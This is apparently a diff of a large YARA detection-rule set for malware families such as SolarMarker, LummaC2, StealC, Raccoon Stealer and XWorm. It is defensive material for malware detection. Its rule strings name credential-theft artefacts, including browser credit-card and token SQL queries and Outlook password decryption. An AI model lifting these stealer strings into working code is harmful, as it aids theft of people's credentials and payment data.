-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Techniques/win_sus_InternetShortcutFile.yar#L1-L19"
-		license_url = "N/A"
-		logic_hash = "9ec321ba521949fcc1db09b843913424182bfbb14eac61e92b7132d88b275ceb"
-		score = 65
-		quality = 58
-		tags = ""
-
-	strings:
-		$s1 = "[InternetShortcut]"
-		$s2 = {55 52 4C 3D 66 69 6C 65 3A 2F 2F}
-		$a1 = ".exe"
-		$a2 = ".dll"
-		$a3 = ".js"
-		$a4 = ".msi"
-		$a5 = ".msix"
-		$a6 = ".bat"
-		$a7 = ".cmd"
+		$s1 = {63 72 65 64 75 69}
+		$s2 = {43 72 65 64 55 49 50 72 6F 6D 70 74 46 6F 72 43 72 65 64 65 6E 74 69 61 6C 73}
+		$s3 = {50 6F 77 65 72 53 68 65 6C 6C}
+		$s4 = {73 65 74 5F 43 75 72 73 6F 72 50 6F 73 69 74 69 6F 6E}
+		$s5 = {73 65 74 5F 41 63 63 65 70 74 42 75 74 74 6F 6E}
+		$s6 = {4D 65 73 73 61 67 65 42 6F 78 42 75 74 74 6F 6E 73}
+		$s7 = {41 67 69 6C 65 44 6F 74 4E 65 74 52 54}
+		$s8 = "_CorExeMain"
 
 	condition:
-		all of ( $s* ) and any of ( $a* )
+		all of them and filesize > 250MB
 }
-rule RUSSIANPANDA_Zharkbot : FILE
+rule RUSSIANPANDA_Solarmarker_Loader_PS2EXE : FILE
 {
 	meta:
-		description = "Detects ZharkBot"
+		description = "Detects SolarMarker loader using PS2EXE"
 		author = "RussianPanda"
-		id = "54213d76-7e27-559d-b653-5390a0c6813c"
-		date = "2024-01-21"
-		modified = "2024-03-12"
-		reference = "https://x.com/ViriBack/status/1749184882822029564?s=20"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/ZharkBot/zharkbot.yar#L1-L15"
+		id = "837883a1-b657-52ae-95c4-ebafc8ac55de"
+		date = "2024-01-04"
+		modified = "2024-01-04"
+		reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SolarMarker/solarmarker_loader.yar#L1-L17"
 		license_url = "N/A"
-		hash = "d53ce8c0a8a89c2e3eb080849da8b1c47eaac614248fc55d03706dd5b4e10bdd"
-		logic_hash = "ffaec6b19dd4385cd1bc156fdfde39a356367c7fba4135c48a8de62a18a78576"
+		hash = "b45c31679c2516b38c7ff8c395f1d11d"
+		logic_hash = "4f579f350c3320e7b811cae0efe7302e852f59adc02d805f64ba464f8a995f25"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {F7 EA C1 FA 04 8B C2 C1 E8 1F 03 C2 8B 55 ?? 0F BE C0 8A CA 6B C0 ?? 2A C8 80 C1}
-		$s2 = {F7 E2 C1 EA 04 0F BE C2 8B 55 ?? 8A CA 6B C0 ?? 2A C8 80 C1 ?? 30 8C 15}
+		$s1 = {72 7B 02 00 70 72 89 02 00 70 72 91 02 00 70 [22] 72 97 02 00 70 72 AB 02 00 70 72 B5 02 00 70}
+		$s2 = {13 0D 72 [3] 70}
+		$s3 = {72 C1 02 00 70 72 B2 03 00 70 72 B8 03 00 70}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and #s1 > 3 and #s2 > 3 and filesize < 500KB
+		all of ( $s* ) and filesize > 200MB
 }
-rule RUSSIANPANDA_Zharkbot_1 : FILE
+rule RUSSIANPANDA_Solardropper
 {
 	meta:
-		description = "Detects ZharkBot, version 1.2.5"
+		description = "SolarMarker first stage detection"
 		author = "RussianPanda"
-		id = "e20875ed-a0a1-5ac8-8758-33766c522c17"
-		date = "2024-09-02"
-		modified = "2024-09-03"
-		reference = "https://research.openanalysis.net/zharkbot/triage/x64dbg/2024/09/02/zharkbot-config.html"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/ZharkBot/Zharkbot.yar#L1-L15"
+		id = "8e40b001-ae00-5768-bb91-e45264748087"
+		date = "2024-01-03"
+		modified = "2024-01-03"
+		reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SolarMarker/solardropper.yar#L1-L15"
 		license_url = "N/A"
-		hash = "1aa0622a744ec4d28a561bac60ec5e907476587efbadfde546d2b145be4b8109"
-		logic_hash = "fded6a0c7af4fda13619778669ef619f88b43e12f12284a3c551c4fddac01024"
+		logic_hash = "5dccb7be94e814335c0c867f8b3dd8855043375fe9f1235d5519c690fc7df842"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "^[a-z]{8}$"
-		$s2 = "^d{6}$"
+		$p1 = {2d 00 71 00 71 00 78 00 74 00 72 00 61 00 63 00 74 00 3a 00 22 00 3c 00 66 00 69 00 6c 00 71 00 71 00 6e 00 61 00 6d 00 71 00 71 00 3e 00 22 00}
+		$p2 = "deimos.exe"
+		$p3 = {5e 00 2d 00 28 00 5b 00 5e 00 3a 00 20 00 5d 00 2b 00 29 00 5b 00 20 00 3a 00 5d 00 3f 00 28 00 5b 00 5e 00 3a 00 5d 00 2a 00 29 00 24 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and filesize < 500KB
+		all of ( $p* )
 }
-rule RUSSIANPANDA_Sentinel_Stealer
+
+rule RUSSIANPANDA_Solarmarker_Loader : FILE
 {
 	meta:
-		description = "Detects Sentinel Stealer"
+		description = "Detects SolarMarker loader 1-4-2024"
 		author = "RussianPanda"
-		id = "8a221d7b-8fa6-53cd-a3e8-63cc67285186"
-		date = "2024-01-19"
-		modified = "2024-01-19"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SentinelStealer/sentinel_stealer.yar#L1-L14"
+		id = "b385fcd4-62b7-5a83-8a2e-6841fdd17526"
+		date = "2024-01-04"
+		modified = "2024-01-04"
+		reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SolarMarker/solarmarker_backdoor.yar#L3-L19"
 		license_url = "N/A"
-		hash = "3a540a8a81c5a5b452f154d7875423a3"
-		logic_hash = "b9d72848842ea4d26544633bb83fccd17239b28493bde3f73341eb2004d8ee0c"
+		hash = "8eeefe0df0b057fc866b8d35625156de"
+		logic_hash = "035eccb41f2ecdeb196003542c165cedad96e3e8e741511b4beda3dfe1ece74e"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "Sentinel.SmallerEncryptedIcon" wide
-		$s2 = "SentinelSteals" wide
-		$s4 = "_CorExeMain"
+		$s1 = {06 [0-7] 58 D1 8C [3] 01 28 [3] 0A 0A}
 
 	condition:
-		all of them
+		all of ( $s* ) and #s1 > 5 and filesize < 7MB and pe.imports ( "mscoree.dll" )
 }
-rule RUSSIANPANDA_Lummac2 : FILE
+rule RUSSIANPANDA_Win_Mal_Stealc_V2 : FILE
 {
 	meta:
-		description = "Detects LummaC2 Stealer"
+		description = "Detects StealC v2"
 		author = "RussianPanda"
-		id = "94d6b63f-066e-59d2-9d14-24c5d5219ba8"
-		date = "2024-09-12"
-		modified = "2024-09-12"
+		id = "052f4556-ddba-5187-8dcb-138f02bc4c36"
+		date = "2025-04-10"
+		modified = "2025-04-10"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/LummaC2/LummaC2.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/StealC/win_mal_StealC_v2.yar#L1-L12"
 		license_url = "N/A"
-		hash = "988f54f9694dd1ae701bacec3b83c752"
-		logic_hash = "875709f48ff93c8e986f3c1d2e32268bf3458d870082072e7727d8ec85b1a021"
+		hash = "bc7e489815352f360b6f0c0064e1d305db9150976c4861b19b614be0a5115f97"
+		logic_hash = "1715ef4e1914a50d8f4a0644ddfd7f9bb2b6f0ec0dfc77615dce4dd5fc943166"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {0F B6 [2-6] 83 ?? 1F}
-		$s2 = {F3 A5 8B 74 24 F8 8B 7C 24 F4 8D 54 24 04 FF 54 24 FC C3}
+		$s1 = {48 8d ?? ?? ?? ??  00 48 8d}
+		$s2 = {0F B7 C8 81 E9 19 04 00 00 74 14 83 E9 09 74 0F 83 E9 01 74 0A 83 E9 1C 74 05 83 F9 04 75 08}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and #s1 > 500 and all of them and filesize < 900KB
 }
-rule RUSSIANPANDA_Win_Mal_Pregrabber : FILE
+
+rule RUSSIANPANDA_Purelogs_Stealer_Core : FILE
 {
 	meta:
-		description = "Detects Pregrabber Plugin"
+		description = "Detects Pure Logs Stealer Core Payload"
 		author = "RussianPanda"
-		id = "a7e5bf1d-b25e-5c46-b191-ee7de13b24e5"
-		date = "2025-02-13"
-		modified = "2025-02-14"
+		id = "bda876c3-76ce-5e1e-8dd4-f06e8240fc11"
+		date = "2023-12-26"
+		modified = "2024-01-10"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/UNC4108/win_mal_PreGrabber.yar#L1-L17"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Pure Logs Stealer/purelogs_stealer_core.yar#L3-L18"
 		license_url = "N/A"
-		hash = "f39319312a567fa771921d11ece66f3ce8996ba45f90d6fc89031b621535eb7e"
-		logic_hash = "4fcf9c71d7e6b8b571f8452a19ccf0be6153def54ce6148915535a54711b0ff0"
+		logic_hash = "7388299ebcc70aeb86c46c29a787f790993a67148d9f3968def1109e45f69452"
 		score = 75
-		quality = 60
+		quality = 83
 		tags = "FILE"
 
 	strings:
-		$s1 = "msgPack"
-		$s2 = "HandlePreGrabber"
-		$s3 = "bdos"
-		$s4 = "uniqueid"
-		$s5 = "mtx"
-		$s6 = "install"
-		$s7 = "mscoree.dll"
+		$s1 = {7E 58 00 00 0A [15] 28 20 00 00 0A 18 6F 0A 02 00 0A 0B}
+		$s2 = {50 6C 67 43 6F 72 65}
+		$s3 = {7E 64 01 00 0A 28 65 01 00 0A}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of ( $s* ) and filesize < 5MB and pe.imports ( "mscoree.dll" )
 }
-rule RUSSIANPANDA_Win_Mal_Chromium_App_Bound_Encryption_Decrypter : FILE
+rule RUSSIANPANDA_Purelogs_Stealer_Initial_Dropper : FILE
 {
 	meta:
-		description = "Detects Potential Chromium app_bound_encryption key Decrypter"
+		description = "Detects PureLogs Stealer Initial Payload"
 		author = "RussianPanda"
-		id = "f3c500cb-52d1-5e89-a927-36da6246d2cb"
-		date = "2025-02-13"
-		modified = "2025-02-14"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/UNC4108/win_mal_Chromium_app_bound_encryption_Decrypter.yar#L1-L26"
+		id = "c1e6a0a0-f8ed-5b78-bcae-55c1c1dfc9e4"
+		date = "2024-01-10"
+		modified = "2024-01-10"
+		reference = "https://russianpanda.com/2023/12/26/Pure-Logs-Stealer-Malware-Analysis/"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Pure Logs Stealer/purelogs_stealer_initial_payload.yar#L1-L19"
 		license_url = "N/A"
-		hash = "0f4dcfd8c9ada67a9b41033fc715d370399fd74ca94dbb8a1ea45b3785c88d02"
-		logic_hash = "e871c9a6762c38baeed287e9350530c2c3cd02333b1830210ef74c258bd223b9"
+		logic_hash = "0fe94c705b94f82163f952d0a29aac4689947a1d439bdc1847ee510c25cf2e40"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$op_chr_1 = {E0 60 88 70 41 F6 11 46}
-		$op_chr_2 = {88 95 7D 86 7D D3 67 5B}
-		$op_chr_3 = {CF BE 3A 46 0D 41 7F 40}
-		$op_chr_4 = {8A F5 0D F3 5A 00 5C C8}
-		$op_br_1 = {AF 31 6B 57 69 63 6B 4B}
-		$op_br_2 = {85 60 E4 B2 03 A9 7A 8B}
-		$op_br_3 = {1E 86 96 F3 8E 0C 71 4C}
-		$op_br_4 = {82 56 2F AE 6D 75 9C E9}
-		$op_edg_1 = {6C E9 CB 1F 97 16 AF 43}
-		$op_edg_2 = {91 40 28 97 C7 C6 97 67}
-		$op_edg_3 = {07 B8 C2 C9 31 77 34 4F}
-		$op_edg_4 = {81 B7 44 FF 77 79 52 2B}
-		$riid1 = {CF BE 3A 46 0D 41 7F 40 8A F5 0D F3 5A 00 5C C8}
-		$riid2 = {1E 86 96 F3 8E 0C 71 4C 82 56 2F AE 6D 75 9C E9}
-		$dll1 = "CoCreateInstance"
-		$dll2 = "CoInitializeEx"
+		$s1 = {73 ?? 00 00 06 28 ?? 00 00 ?? 2A}
+		$s2 = {28 ?? 00 00 06 74 ?? 00 00 1B 28 ?? 00 00 0A 2A}
+		$s3 = {28 ?? 00 00 ?? 75 ?? 00 00 01 72 ?? 00 00 70 6F ?? 00 00 0A 2A}
+		$s4 = {28 ?? 00 00 ?? 75 ?? 00 00 01 72 ?? 00 00 ?? 20 00 01 00 00 14 14 14 6F ?? 00 00 ?? 26}
+		$s5 = {28 ?? 00 00 ?? 73 ?? 00 00 [29] 73 15 00 00 0A [22] 28 01 00 00 2B 28 02 00 00 2B}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $dll* ) and all of ( $riid* ) and 8 of ( $op_* )
+		all of ( $s* ) and uint16( 0 ) == 0x5A4D and filesize < 1MB
 }
 rule RUSSIANPANDA_Win_Mal_Formgrabber : FILE
 {
@@ -160385,28 +161149,31 @@ rule RUSSIANPANDA_Win_Mal_Formgrabber : FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Win_Mal_Juniperstealer : FILE
+rule RUSSIANPANDA_Win_Mal_Pregrabber : FILE
 {
 	meta:
-		description = "Detects Juniper Stealer"
+		description = "Detects Pregrabber Plugin"
 		author = "RussianPanda"
-		id = "d8ad9175-a226-5e09-a206-b3da42c1db42"
+		id = "a7e5bf1d-b25e-5c46-b191-ee7de13b24e5"
 		date = "2025-02-13"
 		modified = "2025-02-14"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/UNC4108/win_mal_JuniperStealer.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/UNC4108/win_mal_PreGrabber.yar#L1-L17"
 		license_url = "N/A"
-		hash = "44dc2777ee8dd6d5cd8ebb10e71caf73b330940131417b5fca2b174a264e19e3"
-		logic_hash = "e3d05058bbb0e8e408f2b6cf24cb2462b6a3f237c3c464b891cda705b4968c02"
+		hash = "f39319312a567fa771921d11ece66f3ce8996ba45f90d6fc89031b621535eb7e"
+		logic_hash = "4fcf9c71d7e6b8b571f8452a19ccf0be6153def54ce6148915535a54711b0ff0"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
 
 	strings:
-		$s1 = "OutlookDecryptPwd"
-		$s2 = "CookiesNew"
-		$s3 = "Cookies128"
-		$s4 = "mscoree.dll"
+		$s1 = "msgPack"
+		$s2 = "HandlePreGrabber"
+		$s3 = "bdos"
+		$s4 = "uniqueid"
+		$s5 = "mtx"
+		$s6 = "install"
+		$s7 = "mscoree.dll"
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
@@ -160462,114 +161229,71 @@ rule RUSSIANPANDA_Win_Mal_Ghostweaver : FILE
 	condition:
 		all of them and filesize < 1MB and @s3 > 100
 }
-rule RUSSIANPANDA_Raccoonstealerv2 : FILE
+rule RUSSIANPANDA_Win_Mal_Chromium_App_Bound_Encryption_Decrypter : FILE
 {
 	meta:
-		description = "Detects the latest unpacked/unobfuscated build 2.1.0-4"
+		description = "Detects Potential Chromium app_bound_encryption key Decrypter"
 		author = "RussianPanda"
-		id = "eda6216a-219b-5f60-8084-4c0c240a4cb4"
-		date = "2023-04-17"
-		modified = "2023-05-05"
+		id = "f3c500cb-52d1-5e89-a927-36da6246d2cb"
+		date = "2025-02-13"
+		modified = "2025-02-14"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/RaccoonStealer_v2/raccoonstealerv2_2.1.0-4_build.yar#L1-L14"
-		license_url = "N/A"
-		logic_hash = "e2226f08753a3571045953363c04ec52de3c79cd0cd29e7ecb6afaf2ad573e4e"
-		score = 50
-		quality = 85
-		tags = "FILE"
-
-	strings:
-		$pattern1 = {B9 ?? ?? ?? 00 E8 ?? ?? ?? 00 ?? ?? 89 45 E8}
-		$pattern2 = {68 ?? ?? ?? 00 ?? 68 01 00 1F 00}
-		$pattern3 = {68 ?? ?? ?? 00 ?? ?? 68 01 00 1F 00 FF 15 64 ?? ?? 00}
-		$m1 = {68 ?? ?? ?? 00 ?? 00 68 01 00 1f 00 ff 15 64 ?? ?? 00}
-		$m2 = {68 ?? ?? ?? 00 ?? 68 01 00 1f 00 ff 15 64 ?? ?? 00}
-
-	condition:
-		2 of ( $pattern* ) and uint16( 0 ) == 0x5A4D and 1 of ( $m* ) and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 200KB
-}
-rule RUSSIANPANDA_Raccoonstealer : FILE
-{
-	meta:
-		description = "Detects Raccoon Stealer v2.3.1.1"
-		author = "RussianPanda"
-		id = "29f28cd5-370b-5831-8b71-a253f468f7e4"
-		date = "2024-01-08"
-		modified = "2024-01-08"
-		reference = "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-raccoon-stealer-v2-0"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/RaccoonStealer_v2/raccoonstealer_v2.3.1.1.yar#L1-L20"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/UNC4108/win_mal_Chromium_app_bound_encryption_Decrypter.yar#L1-L26"
 		license_url = "N/A"
-		hash = "c6d0d98dd43822fe12a1d785df4e391db3c92846b0473b54762fbb929de6f5cb"
-		logic_hash = "ee2b39c1c2068b97e63a03330a2f9e2f12e53aaf9cfffb274acde2372a11fe45"
+		hash = "0f4dcfd8c9ada67a9b41033fc715d370399fd74ca94dbb8a1ea45b3785c88d02"
+		logic_hash = "e871c9a6762c38baeed287e9350530c2c3cd02333b1830210ef74c258bd223b9"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {8B 0D [2] 41 00 A3 [3] 00}
-		$s2 = "MachineGuid"
-		$s3 = "SELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM credit_cards"
-		$s4 = "SELECT service, encrypted_token FROM token_service"
-		$s5 = "&configId="
-		$s6 = "machineId="
+		$op_chr_1 = {E0 60 88 70 41 F6 11 46}
+		$op_chr_2 = {88 95 7D 86 7D D3 67 5B}
+		$op_chr_3 = {CF BE 3A 46 0D 41 7F 40}
+		$op_chr_4 = {8A F5 0D F3 5A 00 5C C8}
+		$op_br_1 = {AF 31 6B 57 69 63 6B 4B}
+		$op_br_2 = {85 60 E4 B2 03 A9 7A 8B}
+		$op_br_3 = {1E 86 96 F3 8E 0C 71 4C}
+		$op_br_4 = {82 56 2F AE 6D 75 9C E9}
+		$op_edg_1 = {6C E9 CB 1F 97 16 AF 43}
+		$op_edg_2 = {91 40 28 97 C7 C6 97 67}
+		$op_edg_3 = {07 B8 C2 C9 31 77 34 4F}
+		$op_edg_4 = {81 B7 44 FF 77 79 52 2B}
+		$riid1 = {CF BE 3A 46 0D 41 7F 40 8A F5 0D F3 5A 00 5C C8}
+		$riid2 = {1E 86 96 F3 8E 0C 71 4C 82 56 2F AE 6D 75 9C E9}
+		$dll1 = "CoCreateInstance"
+		$dll2 = "CoInitializeEx"
 
 	condition:
-		all of ( $s* ) and #s1 > 10 and uint16( 0 ) == 0x5A4D and filesize < 5MB
+		uint16( 0 ) == 0x5A4D and all of ( $dll* ) and all of ( $riid* ) and 8 of ( $op_* )
 }
-rule RUSSIANPANDA_Win_Mal_Xworm : FILE
+rule RUSSIANPANDA_Win_Mal_Juniperstealer : FILE
 {
 	meta:
-		description = "Detects XWorm RAT"
+		description = "Detects Juniper Stealer"
 		author = "RussianPanda"
-		id = "5701f382-3c97-5a00-9673-6c39b0f11cc2"
-		date = "2024-03-11"
-		modified = "2024-03-11"
+		id = "d8ad9175-a226-5e09-a206-b3da42c1db42"
+		date = "2025-02-13"
+		modified = "2025-02-14"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/XWorm/win_mal_XWorm.yar#L1-L15"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/UNC4108/win_mal_JuniperStealer.yar#L1-L14"
 		license_url = "N/A"
-		hash = "fc422800144383ef6e2e0eee37e7d6ba"
-		logic_hash = "c42544285517dc61628e8df2ee5ab6733924fbb2cc08b9b2df273eec0a401d90"
+		hash = "44dc2777ee8dd6d5cd8ebb10e71caf73b330940131417b5fca2b174a264e19e3"
+		logic_hash = "e3d05058bbb0e8e408f2b6cf24cb2462b6a3f237c3c464b891cda705b4968c02"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {4D 00 6F 00 64 00 69 00 66 00 69 00 65 00 64 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 66 00 75 00 6C 00 6C 00 79 00 21}
-		$s2 = {50 00 6C 00 75 00 67 00 69 00 6E 00 73 00 20 00 52 00 65 00 6D 00 6F 00 76 00 65 00 64 00 21}
-		$s3 = {73 00 65 00 6E 00 64 00 50 00 6C 00 75 00 67 00 69 00 6E}
-		$s4 = {4D 00 6F 00 64 00 69 00 66 00 69 00 65 00 64 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 66 00 75 00 6C 00 6C 00 79 00 21}
-		$s5 = "_CorExeMain"
+		$s1 = "OutlookDecryptPwd"
+		$s2 = "CookiesNew"
+		$s3 = "Cookies128"
+		$s4 = "mscoree.dll"
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Darkvnc : FILE
-{
-	meta:
-		description = "Detects DarkVNC"
-		author = "RussianPanda"
-		id = "dbc86ac8-5ea3-59a7-b3ab-68c603165720"
-		date = "2024-01-15"
-		modified = "2024-01-15"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/DarkVNC/darkvnc.yar#L1-L15"
-		license_url = "N/A"
-		hash = "3c74dccd06605bcf527ffc27b3122959"
-		logic_hash = "1dd1246e0b22181706433f0cff9b231017e747d8faaa2db4cb9adefeab492ab7"
-		score = 75
-		quality = 85
-		tags = "FILE"
-
-	strings:
-		$s1 = {66 89 84 24 ?? 00 00 00 B8 ?? 00 00 00}
-		$s2 = {66 31 14 41 48}
-		$s3 = "VncStopServer"
-		$s4 = "VncStartServer"
-
-	condition:
-		uint16( 0 ) == 0x5A4D and 3 of them and filesize < 700KB
-}
-rule RUSSIANPANDA_Meduzastealer : FILE
+rule RUSSIANPANDA_Meduzastealer_1 : FILE
 {
 	meta:
 		description = "Detects MeduzaStealer 1-2024"
@@ -160594,237 +161318,189 @@ rule RUSSIANPANDA_Meduzastealer : FILE
 	condition:
 		3 of ( $s* ) and filesize < 1MB
 }
-rule RUSSIANPANDA_Neptune_Loader : FILE
+rule RUSSIANPANDA_Truecrypt_Crypter : FILE
 {
 	meta:
-		description = "Detects Neptune Loader"
+		description = "Detects TrueCrypt crypter"
 		author = "RussianPanda"
-		id = "d576bf47-10bd-55d0-99b0-69c02dc87f17"
-		date = "2024-01-17"
-		modified = "2024-01-21"
+		id = "3ecf9c2f-6205-5e55-83a5-2b4e3ba89f07"
+		date = "2024-01-06"
+		modified = "2024-01-06"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/NeptuneLoader/neptune_loader.yar#L1-L18"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/TrueCrypt/truecrypt_crypter.yar#L1-L27"
 		license_url = "N/A"
-		logic_hash = "ca54b8a624d48aa28bc727420f25e6f0fd67b193ac79443a357d88a9fe7cbdbb"
+		hash = "167637397fb45ea19bafcf208d8f27dceec82caa7ab19d40ecdb08eb1b7d4f60"
+		logic_hash = "68612c68053e9fb81d9616c04b04ac2e2cb685f3b7ed71f8b31e8f22e3a539e7"
 		score = 75
 		quality = 81
 		tags = "FILE"
 
 	strings:
-		$s1 = {8B C6 E8 F4 FB FF FF}
-		$s2 = {66 33 D1 66 89 54 58 FE}
-		$s3 = {7C 53 74 61 72 74 75 70 46 6F 6C 64 65 72 7C}
-		$s4 = {44 65 6C 70 68 69}
-		$t1 = {C7 [3] 0B 40 40 00 [6] A1 ?? 61 40 00}
-		$t2 = {C7 ?? 24 00 40 40 00 A1 ?? 61 40 00}
-		$t3 = {8B ?? ?? FF D0 B8}
+		$s1_crpt1 = {77 69 6E 65 5F 67 65 74}
+		$s2_crpt1 = {49 3B 66 10 76}
+		$s2_crpt2 = {3B 55 48 89 E5 48 83 EC 10 90 8B 0D [22] E8 [3] FF}
+		$s3_crpt1 = {49 3B 66 10 76 43}
+		$s3_crpt2 = {55 48 89 E5 48 83 EC 10 [5] E8 [4] 48 85 FF 75 18}
+		$s4_crpt1 = {40 C0 EE 04 [16] 48 83}
+		$s4_crpt2 = {FA 20 [0-22] 48 83 FE 20}
+		$a_crpt = {61 2E 6F 75 74 2E 65 78 65 00 5F 63 67}
+		$s_crpt = {6F 5F 64 75 6D 6D 79 5F 65 78 70 6F 72 74}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of ( $s* ) or 2 of ( $t* ) and filesize < 6MB
+		uint16( 0 ) == 0x5A4D and $s1_crpt1 and $s2_crpt1 and $s2_crpt2 and $s3_crpt1 and $s3_crpt2 and $s4_crpt1 and $s4_crpt2 and $a_crpt and $s_crpt and filesize < 7MB
 }
-
-rule RUSSIANPANDA_Workersdevbackdoor : FILE
+rule RUSSIANPANDA_Mal_Nitrogen : FILE
 {
 	meta:
-		description = "Detects WorkersDevBackdoor"
+		description = "Detects Nitrogen campaign"
 		author = "RussianPanda"
-		id = "725e0924-c108-5927-8d27-e4bc5b284883"
-		date = "2023-12-15"
-		modified = "2024-01-05"
+		id = "9d591f87-47ec-54ea-b0ae-26a0542733a0"
+		date = "2024-02-04"
+		modified = "2024-02-04"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/WorkersDevBackdoor/WorkDevBackdoor.yar#L3-L20"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Nitrogen/mal_nitrogen.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "f92ad9dc657d87a47e539ea2ee896f9b86bb95e51a890a838c6e6b0efa5deb7d"
+		logic_hash = "642d5a16c7fb217a297bba683221de474eb028ac48ec8f52be897eaa056acb9b"
 		score = 75
-		quality = 85
+		quality = 79
 		tags = "FILE"
 
 	strings:
-		$s1 = {72 00 65 00 67 00 69 00 73 00 74 00 65 00 72 00 20 00 7B 00 30 00 7D 00 20 00 7B 00 31 00 7D}
-		$s2 = {72 FB 00 00 70 72 13 01 00 70 28 20 00 00 0A 72 2D 01 00 70}
-		$s3 = {55 00 53 00 45 00 52 00 44 00 4F 00 4D 00 41 00 49 00 4E}
-		$s4 = {43 00 4F 00 4D 00 50 00 55 00 54 00 45 00 52 00 4E 00 41 00 4D 00 45}
+		$s1 = {63 7C 77 7B F2 6B 6F C5}
+		$s2 = {52 09 6A D5 30 36 A5 38}
+		$s3 = {6F 72 69 67 69 6E 61 6C 5F 69 6E 73 74 61 6C 6C}
+		$s4 = {43 3A 5C 55 73 65 72 73 5C 50 75 62 6C 69 63 5C 44 6F 77 6E 6C 6F 61 64}
+		$s5 = {25 00 43 00 55 00 52 00 52 00 45 00 4E 00 54 00 5F 00 44 00 45 00 52 00 45 00 43 00 54 00 4F 00 52 00 59 00 25}
+		$s6 = {4E 69 74 72 6F 67 65 6E 54 61 72 67 65 74}
 
 	condition:
